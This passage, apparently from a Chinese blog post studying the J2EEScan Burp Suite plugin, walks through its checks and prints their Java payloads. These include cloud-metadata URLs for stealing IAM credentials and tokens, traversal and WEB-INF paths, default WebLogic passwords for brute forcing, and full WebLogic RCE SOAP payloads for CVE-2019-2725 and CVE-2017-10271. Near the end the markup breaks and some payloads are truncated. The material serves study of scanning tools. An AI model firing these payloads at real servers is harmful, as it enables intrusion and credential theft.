            <span class="token string">"ftp://0.0.0.0:22/"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"ftp://0177.0000.0000.0001:22"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"ftp://0x7f.1:22/"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"http://spoofed.burpcollaborator.net:22/"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>这是打本地的22端口<br> match就是</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING <span class="token operator">=</span> <span class="token string">"OpenSSH"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>然后就是访问云上各种元数据</p> 
  <pre><code class="prism language-java">  <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">Map</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token operator">></span> SSRF_CLOUD_INJECTION_TESTS <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">HashMap</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token operator">></span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token punctuation">{</span>
            <span class="token function">put</span><span class="token punctuation">(</span><span class="token string">"http://169.254.169.254/latest/meta-data/"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"identity-credentials"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>CASE_INSENSITIVE <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>MULTILINE<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token function">put</span><span class="token punctuation">(</span><span class="token string">"http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"token_type"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>CASE_INSENSITIVE <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>MULTILINE<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        
        <span class="token punctuation">}</span>
</code></pre> 
  <p>这里注释给出了一些情况</p> 
  <pre><code class="prism language-java">     <span class="token operator">*</span>
     <span class="token operator">*</span> <span class="token class-name">Source</span> AWS
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span>docs<span class="token punctuation">.</span>aws<span class="token punctuation">.</span>amazon<span class="token punctuation">.</span>com<span class="token operator">/</span>AWSEC2<span class="token operator">/</span>latest<span class="token operator">/</span><span class="token class-name">UserGuide</span><span class="token operator">/</span>ec2<span class="token operator">-</span>instance<span class="token operator">-</span>metadata<span class="token punctuation">.</span>html
     <span class="token operator">*</span>
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>user<span class="token operator">-</span>data
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>user<span class="token operator">-</span>data<span class="token operator">/</span>iam<span class="token operator">/</span>security<span class="token operator">-</span>credentials<span class="token operator">/</span><span class="token punctuation">[</span>ROLENAME<span class="token punctuation">]</span>
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>meta<span class="token operator">-</span>data<span class="token operator">/</span>iam<span class="token operator">/</span>security<span class="token operator">-</span>credentials<span class="token operator">/</span><span class="token punctuation">[</span>ROLENAME<span class="token punctuation">]</span> 
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>meta<span class="token operator">-</span>data<span class="token operator">/</span>ami<span class="token operator">-</span>id
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>meta<span class="token operator">-</span>data<span class="token operator">/</span>reservation<span class="token operator">-</span>id
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>meta<span class="token operator">-</span>data<span class="token operator">/</span>hostname
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>meta<span class="token operator">-</span>data<span class="token operator">/</span><span class="token keyword">public</span><span class="token operator">-</span>keys<span class="token operator">/</span><span class="token number">0</span><span class="token operator">/</span>openssh<span class="token operator">-</span>key
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>meta<span class="token operator">-</span>data<span class="token operator">/</span><span class="token keyword">public</span><span class="token operator">-</span>keys<span class="token operator">/</span><span class="token punctuation">[</span>ID<span class="token punctuation">]</span><span class="token operator">/</span>openssh<span class="token operator">-</span>key
     <span class="token operator">*</span>
     <span class="token operator">*</span> # AWS <span class="token operator">-</span> <span class="token class-name">Dirs</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>meta<span class="token operator">-</span>data<span class="token operator">/</span>
     <span class="token operator">*</span> http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">169.254</span><span class="token number">.169</span><span class="token number">.254</span><span class="token operator">/</span>latest<span class="token operator">/</span>meta<span class="token operator">-</span>data<span class="token operator">/</span><span class="token keyword">public</span><span class="token operator">-</span>keys<span class="token operator">/</span>
     <span class="token operator">*</span>
</code></pre> 
  <p>互联网上也有很多总结</p> 
  <pre><code class="prism language-java">http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span>cn<span class="token operator">-</span>sec<span class="token punctuation">.</span>com<span class="token operator">/</span>archives<span class="token operator">/</span><span class="token number">840191.</span>html
</code></pre> 
  <h3>【62】StatusServlet</h3> 
  <p>payload</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> STATUS_SERVLET_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/status?full=true"</span><span class="token punctuation">,</span>
            <span class="token string">"/web-console/status?full=true"</span><span class="token punctuation">,</span>
            <span class="token string">"/server-status?full=true"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>如果是401</p> 
  <pre><code class="prism language-java">           <span class="token keyword">if</span> <span class="token punctuation">(</span>statusInfo<span class="token punctuation">.</span><span class="token function">getStatusCode</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">401</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>

</code></pre> 
  <p>则认为是存在登录接口<br> 然后就是弱口令测试</p> 
  <pre><code class="prism language-java">                        <span class="token class-name">WeakPasswordBruteforcer</span> br <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">WeakPasswordBruteforcer</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>如果match到了200且有如下返回,说明存在不同类型服务信息泄露</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING_J2EE <span class="token operator">=</span> <span class="token string">"Status Servlet"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING_HTTPD <span class="token operator">=</span> <span class="token string">"Apache Server Status"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>


</code></pre> 
  <h3>【63】TomcatHostManager</h3> 
  <p>tomcat管理后台泄露,比较常见了</p> 
  <pre><code class="prism language-java"><span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> TOMCAT_HOST_MANAGER_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/host-manager/html?j2eescan"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>爆破</p> 
  <h3>【64】TomcatManager</h3> 
  <p>同63</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> TOMCAT_MANAGER_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/manager/html"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <h3>【65】UndertowTraversal CVE-2014-7816</h3> 
  <p>Jboss的问题<br> payload</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> JBOSS_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/..\\\\standalone\\\\configuration\\\\standalone.xml"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>match的是读取的xml</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_STRINGS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"<server"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
 
</code></pre> 
  <h3>【66】URINormalizationTomcat</h3> 
  <p>未授权访问tomcat</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> TOMCAT_URI_NORMALIZATIONS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"..;/manager/html"</span><span class="token punctuation">,</span>
            <span class="token string">"..;/"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>眼熟啊,shiro的未授权访问也是这么绕的</p> 
  <h3>【67】UTF8ResponseSplitting</h3> 
  <p>好像又是个crlf<br> payload</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> INJ <span class="token operator">=</span> <span class="token string">"%E5%98%8A%E5%98%8DX-Injection:%20test"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>match返回包</p> 
  <pre><code class="prism language-java">        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">getResponseHeaderValue</span><span class="token punctuation">(</span>responseInfo<span class="token punctuation">,</span> <span class="token string">"X-Injection"</span><span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token keyword">null</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>

</code></pre> 
  <h3>【68】WebInfInformationDisclosure</h3> 
  <p>payload</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> WEBINF_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/WEB-INF./web.xml"</span><span class="token punctuation">,</span>
            <span class="token string">"//WEB-INF/web.xml"</span><span class="token punctuation">,</span>
            <span class="token string">"/WEB-INF/web.xml"</span><span class="token punctuation">,</span>
            <span class="token string">"/static/WEB-INF/web.xml"</span><span class="token punctuation">,</span> <span class="token comment">// CVE-2014-0053 </span>
            <span class="token string">"/forward:/WEB-INF/web.xml"</span><span class="token punctuation">,</span> <span class="token comment">// spring issue</span>
            <span class="token string">"/web-inf./web.xml"</span><span class="token punctuation">,</span> <span class="token comment">// CVE-2016-0793 https://bugzilla.redhat.com/show_bug.cgi?id=1305937</span>
            <span class="token string">"/.//WEB-INF/web.xml"</span><span class="token punctuation">,</span>
            <span class="token string">"/./WEB-INF/web.xml"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>match</p> 
  <pre><code class="prism language-java"> <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING <span class="token operator">=</span> <span class="token string">"<web-app"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>任意文件读取也可以多尝试此类文件。</p> 
  <h3>【69】WeblogicConsole</h3> 
  <p>登录接口path</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> WEBLOGIC_CONSOLE_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/console/login/LoginForm.jsp;ADMINCONSOLESESSION=TynPs0LnRt9BLctc13WMYmhQpsp3cG1LCNDp78TJyDfHMWhC4Kln!1225542286"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>match</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_WEBLOGIC_STRINGS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"<TITLE>BEA WebLogic Server Administration Console"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"<title>Oracle WebLogic Server Administration Console"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"<TITLE>WebLogic Server"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>说明存在爆破的可能<br> 然后开始爆破</p> 
  <pre><code class="prism language-java">        <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">Map<span class="token punctuation">.</span>Entry</span><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">,</span> <span class="token class-name">String</span><span class="token punctuation">></span><span class="token punctuation">></span></span> credentials <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">ArrayList</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic01"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"welcome1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>比较粗糙,只尝试了4个弱口令和一个账号。</p> 
  <h3>【70】Weblogic CVE-2019-2725</h3> 
  <p>问题路径</p> 
  <pre><code class="prism language-java"><span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> ASYNC_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/_async/AsyncResponseService"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>payload</p> 
  <pre><code class="prism language-java">    <span class="token class-name">String</span> serializedRce <span class="token operator">=</span> <span class="token string">"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">   "</span>
                    <span class="token operator">+</span> <span class="token string">"<soapenv:Header>"</span>
                    <span class="token operator">+</span> <span class="token string">"<wsa:Action>ONRaJntRjNYBc3MJW2JC</wsa:Action>"</span>
                    <span class="token operator">+</span> <span class="token string">"<wsa:RelatesTo>42PlWZ15ODi1hQ3pQ5Ol</wsa:RelatesTo>"</span>
                    <span class="token operator">+</span> <span class="token string">"<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<void class=\"java.lang.ProcessBuilder\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<array class=\"java.lang.String\" length=\"3\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<void index=\"0\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<string>/bin/bash</string>"</span>
                    <span class="token operator">+</span> <span class="token string">"</void>"</span>
                    <span class="token operator">+</span> <span class="token string">"<void index=\"1\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<string>-c</string>"</span>
                    <span class="token operator">+</span> <span class="token string">"</void>"</span>
                    <span class="token operator">+</span> <span class="token string">"<void index=\"2\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<string>ping -c 3 %s</string>"</span>
                    <span class="token operator">+</span> <span class="token string">"</void>"</span>
                    <span class="token operator">+</span> <span class="token string">"</array>"</span>
                    <span class="token operator">+</span> <span class="token string">"<void method=\"start\"/></void>"</span>
                    <span class="token operator">+</span> <span class="token string">"</work:WorkContext>"</span>
                    <span class="token operator">+</span> <span class="token string">"</soapenv:Header>"</span>
                    <span class="token operator">+</span> <span class="token string">"<soapenv:Body>"</span>
                    <span class="token operator">+</span> <span class="token string">"<asy:onAsyncDelivery/>"</span>
                    <span class="token operator">+</span> <span class="token string">"</soapenv:Body></soapenv:Envelope>"</span><span class="token punctuation">;</span>

            <span class="token comment">// Collaborator context</span>
</code></pre> 
  <p>这是个RCE hw用的可能比较多</p> 
  <h3>【71】Weblogic CVE-2017-10271</h3> 
  <p>这个可以尝试的path就更多了</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> WLS_WSAT_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/wls-wsat/CoordinatorPortType"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/CoordinatorPortType11"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/ParticipantPortType"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/ParticipantPortType11"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/RegistrationPortTypeRPC"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/RegistrationPortTypeRPC11"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/RegistrationRequesterPortType"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/RegistrationRequesterPortType11"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>payload</p> 
  <pre><code class="prism language-java">  <span class="token class-name">String</span> serializedRce <span class="token operator">=</span> <span class="token string">"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<soapenv:Header>"</span>
                    <span class="token operator">+</span> <span class="token string">"<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"</span>
                    <span class="token operator">+</span> <span class="token string">"  <java version=\"1.8\" class=\"java.beans.XMLDecoder\">"</span>
                    <span class="token operator">+</span> <span class="token string">"    <void id=\"url\" class=\"java.net.URL\">"</span>
                    <span class="token operator">+</span> <span class="token string">"      <string>http://%s</string>"</span>
                    <span class="token operator">+</span> <span class="token string">"    </void>"</span>
                    <span class="token operator">+</span> <span class="token string">"    <void idref=\"url\">"</span>
                    <span class="token operator">+</span> <span class="token string">"      <void id=\"stream\" method = \"openStream\" />"</span>
                    <span class="token operator">+</span> <span class="token string">"    </void>"</span>
                    <span class="token operator">+</span> <span class="token string">"  </java>"</span>
                    <span class="token operator">+</span> <span class="token string">"</work:WorkContext>"</span>
                    <span class="token operator">+</span> <span class="token string">"</soapenv:Header>"</span>
                    <span class="token operator">+</span> <span class="token string">"<soapenv:Body/>"</span>
                    <span class="token operator">+</span> <span class="token string">"</soapenv:Envelope>"</span><span class="token punctuation">;</span>
</code></pre> 
  <p>这也是RCE</p> 
  <h3>【72】WeblogicUDDIExplorer CVE-2014-4210 ssrf</h3> 
  <p>path</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> UDDI_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/uddiexplorer/"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>match到这些</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_SSRF_STRINGS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"could not connect over HTTP to server:"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"XML_SoapException: Connection refused"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"XML_SoapException: Received a response from url"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>说明存在SSRF</p> 
  <p>比较粗的判断<br> 实际还需要去发送特定的漏洞请求<br> <a href="http://img.e-com-net.com/image/info8/2f1faee7f6be4d1281ed8ed8ea2284ae.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/2f1faee7f6be4d1281ed8ed8ea2284ae.jpg" alt="【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第23张图片" width="650" height="493" style="border:1px solid black;"></a></p> 
  <h3>【73】WeblogicWebServiceTestPage CVE-2018-2894</h3> 
  <p>漏洞path</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> WS_TEST_PAGES <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/ws_utc/config.do"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>match</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_STRINGS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"<title>settings".getBytes()
    );

则存在漏洞

这是个任意文件上传的测试页面,不需要权限控制
在这里插入图片描述

【74】XInclude 任意文件上传

payload一把锁

    private static final List<byte[]> XINCLUDE_INJ_TESTS = Arrays.asList(
            "".getBytes());  

【75】XXEModule

payload

    private static final String XXE_DTD_DEFINITION = "]>";

这是可回显的,看着像是通用性的一个插件

